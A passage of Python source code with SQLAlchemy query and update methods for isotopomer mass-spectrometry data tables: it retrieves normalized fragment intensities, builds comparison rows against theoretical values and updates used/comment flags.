data_stage01_isotopomer_averagesNormSum.fragment_mass,
MS_components.precursor_fragment,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.abs_devFromTheoretical,
data_stage01_isotopomer_spectrumAccuracyNormSum.spectrum_accuracy,
data_stage01_isotopomer_averagesNormSum.scan_type).order_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula.desc(),
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
# NOTE: this algorithm will break if there is no data for the a0 mass or if there are jumps in the a values (i.e., a0 to a2);
fragment_formula = '';
fragment_formula_old = '';
data_cnt = len(data)-1;
i = 0;
while i <= data_cnt:
fragment_formula_old = data[i].fragment_formula;
row_key = [];
row_theoretical = [];
row_measured = [];
row_measured_cv = [];
row_measured_dif = [];
row_spectrum_accuracy = [];
row = [];
for a in range(50):
if i <= data_cnt:
fragment_formula = data[i].fragment_formula;
if fragment_formula == fragment_formula_old:
if a == 0:
# add key columns
row_key.append(sample_name_abbreviation_I);
row_key.append(time_point_I);
row_key.append(met_id_I);
row_key.append(data[i].fragment_formula);
row_key.append(str(data[i].precursor_fragment));
row_key.append(data[i].scan_type);
row_spectrum_accuracy.append(data[i].spectrum_accuracy);
mass0 = data[i].fragment_mass;  # reference (a0) mass
massi = data[i].fragment_mass;
massDif = massi-mass0;  # mass difference from a0 (not used further below)
# add a+0... information
if data[i].intensity_theoretical: theoretical = numpy.round(data[i].intensity_theoretical,3);
else: theoretical = data[i].intensity_theoretical;
row_theoretical.append(theoretical)
if data[i].intensity_normalized_average: measured = numpy.round(data[i].intensity_normalized_average,3);
else: measured = data[i].intensity_normalized_average;
row_measured.append(measured)
if data[i].intensity_normalized_cv: cv = numpy.round(data[i].intensity_normalized_cv,3);
else: cv = data[i].intensity_normalized_cv;
row_measured_cv.append(cv);
if data[i].abs_devFromTheoretical: dif = numpy.round(data[i].abs_devFromTheoretical,3)
else: dif = data[i].abs_devFromTheoretical;
row_measured_dif.append(dif)
i += 1;
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
else:
row_theoretical.append(None);
row_measured.append(None);
row_measured_cv.append(None);
row_measured_dif.append(None);
row.extend(row_key);
row.extend(row_theoretical);
row.extend(row_measured);
row.extend(row_measured_cv);
row.extend(row_measured_dif);
row.extend(row_spectrum_accuracy);
data_O.append(row);
return data_O;
except SQLAlchemyError as e:
print(e);
# query row from data_stage01_isotopomer_averagesNormSum
def get_dataProductFragment_experimentIDAndSampleAbbreviation_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I):
'''Query normalized product-fragment peak data for a specific experiment_id and sample_name_abbreviation'''
try:
data = self.session.query(data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.scan_type,
data_stage01_isotopomer_averagesNormSum.experiment_id,
data_stage01_isotopomer_averagesNormSum.time_point,
data_stage01_isotopomer_averagesNormSum.sample_type,
data_stage01_isotopomer_averagesNormSum.met_id,
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation,
MS_components.product_fragment).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(MS_components.product_formula),
data_stage01_isotopomer_averagesNormSum.met_id.like(MS_components.met_id),
MS_components.ms_methodtype.like('tuning'),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).group_by(
data_stage01_isotopomer_averagesNormSum.fragment_formula,
data_stage01_isotopomer_averagesNormSum.fragment_mass,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_average,
data_stage01_isotopomer_averagesNormSum.intensity_normalized_cv,
data_stage01_isotopomer_averagesNormSum.intensity_theoretical,
data_stage01_isotopomer_averagesNormSum.scan_type,
data_stage01_isotopomer_averagesNormSum.experiment_id,
data_stage01_isotopomer_averagesNormSum.time_point,
data_stage01_isotopomer_averagesNormSum.sample_type,
data_stage01_isotopomer_averagesNormSum.met_id,
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation,
MS_components.product_fragment).order_by(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.asc(),
data_stage01_isotopomer_averagesNormSum.sample_type.asc(),
data_stage01_isotopomer_averagesNormSum.met_id.asc(),
data_stage01_isotopomer_averagesNormSum.fragment_formula.desc(),
data_stage01_isotopomer_averagesNormSum.fragment_mass.asc()).all();
data_O = [];
if not data:
print('No normalized intensities found for the following:')
print('sample_name_abbreviation: ' + sample_name_abbreviation_I);
return data_O;
else:
for d in data:
#TODO:
data_O.append(d);
return data_O;
except SQLAlchemyError as e:
print(e);
def get_rows_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(self,experiment_id_I,sample_name_abbreviation_I,time_point_I,sample_type_I,scan_type_I,met_id_I):
'''Query the used rows for the experiment, sample abbreviation, time point, sample type, scan type, and met id'''
try:
rows = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(sample_name_abbreviation_I),
data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I),
data_stage01_isotopomer_averagesNormSum.time_point.like(time_point_I),
data_stage01_isotopomer_averagesNormSum.sample_type.like(sample_type_I),
data_stage01_isotopomer_averagesNormSum.scan_type.like(scan_type_I),
data_stage01_isotopomer_averagesNormSum.met_id.like(met_id_I),
data_stage01_isotopomer_averagesNormSum.used_.is_(True)).all();
rows_O = [];
if not(rows):
print("no results found")
print("experiment_id_I sample_name_abbreviation_I time_point_I scan_type_I met_id_I");
print(experiment_id_I,sample_name_abbreviation_I,time_point_I,scan_type_I,met_id_I);
else:
for d in rows:
rows_O.append({
#'id':d.id,
'experiment_id':d.experiment_id,
'sample_name_abbreviation':d.sample_name_abbreviation,
'sample_type':d.sample_type,
'time_point':d.time_point,
'met_id':d.met_id,
'fragment_formula':d.fragment_formula,
'fragment_mass':d.fragment_mass,
'intensity_normalized_average':d.intensity_normalized_average,
'intensity_normalized_cv':d.intensity_normalized_cv,
'intensity_normalized_units':d.intensity_normalized_units,
'intensity_theoretical':d.intensity_theoretical,
'abs_devFromTheoretical':d.abs_devFromTheoretical,
'scan_type':d.scan_type,
'used_':d.used_,
'comment_':d.comment_});
return rows_O;
except SQLAlchemyError as e:
print(e);
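# Example usage (hypothetical sketch; argument values are assumptions):
#   rows = iq.get_rows_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum(
#       'ALEOx_01','OxicWT','0','analytical','EPI','fdp');
#   # -> list of dicts, one per used_ row, suitable as input to the update methods below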
def update_dataStage01IsotopomerAverages_usedAndComment(self,dataListUpdated_I):
'''Update the used_ and comment_ fields of data_stage01_isotopomer_averages'''
for d in dataListUpdated_I:
try:
data_update = self.session.query(data_stage01_isotopomer_averages).filter(
data_stage01_isotopomer_averages.experiment_id.like(d['experiment_id']),
data_stage01_isotopomer_averages.sample_name_abbreviation.like(d['sample_name_abbreviation']),
data_stage01_isotopomer_averages.time_point.like(d['time_point']),
data_stage01_isotopomer_averages.sample_type.like(d['sample_type']),
data_stage01_isotopomer_averages.met_id.like(d['met_id']),
data_stage01_isotopomer_averages.fragment_formula.like(d['fragment_formula']),
data_stage01_isotopomer_averages.fragment_mass == int(d['fragment_mass']),
data_stage01_isotopomer_averages.scan_type.like(d['scan_type'])
).update(
{
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
if data_update == 0:
print('row not found.')
print(d)
except SQLAlchemyError as e:
print(e);
self.session.commit();
def update_dataStage01IsotopomerAveragesNormSum_usedAndComment(self,dataListUpdated_I):
'''Update the used_ and comment_ fields of data_stage01_isotopomer_averagesNormSum'''
for d in dataListUpdated_I:
try:
data_update = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(
data_stage01_isotopomer_averagesNormSum.experiment_id.like(d['experiment_id']),
data_stage01_isotopomer_averagesNormSum.sample_name_abbreviation.like(d['sample_name_abbreviation']),
data_stage01_isotopomer_averagesNormSum.time_point.like(d['time_point']),
data_stage01_isotopomer_averagesNormSum.sample_type.like(d['sample_type']),
data_stage01_isotopomer_averagesNormSum.met_id.like(d['met_id']),
data_stage01_isotopomer_averagesNormSum.fragment_formula.like(d['fragment_formula']),
data_stage01_isotopomer_averagesNormSum.fragment_mass == int(d['fragment_mass']),
data_stage01_isotopomer_averagesNormSum.scan_type.like(d['scan_type'])
).update(
{
'used_':d['used_'],
'comment_':d['comment_']},
synchronize_session=False);
if data_update == 0:
print('row not found.')
print(d)
except SQLAlchemyError as e:
print(e);
self.session.commit();
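# Example usage for the two update methods above (hypothetical sketch; the dict
# values are assumptions). Each entry must carry the full key plus the new flags:
#   iq.update_dataStage01IsotopomerAveragesNormSum_usedAndComment([{
#       'experiment_id':'ALEOx_01','sample_name_abbreviation':'OxicWT',
#       'time_point':'0','sample_type':'analytical','met_id':'fdp',
#       'fragment_formula':'C6H13O12P2','fragment_mass':368,
#       'scan_type':'EPI','used_':False,'comment_':'outlier'}]);
#   # a single commit is issued after the whole list is processed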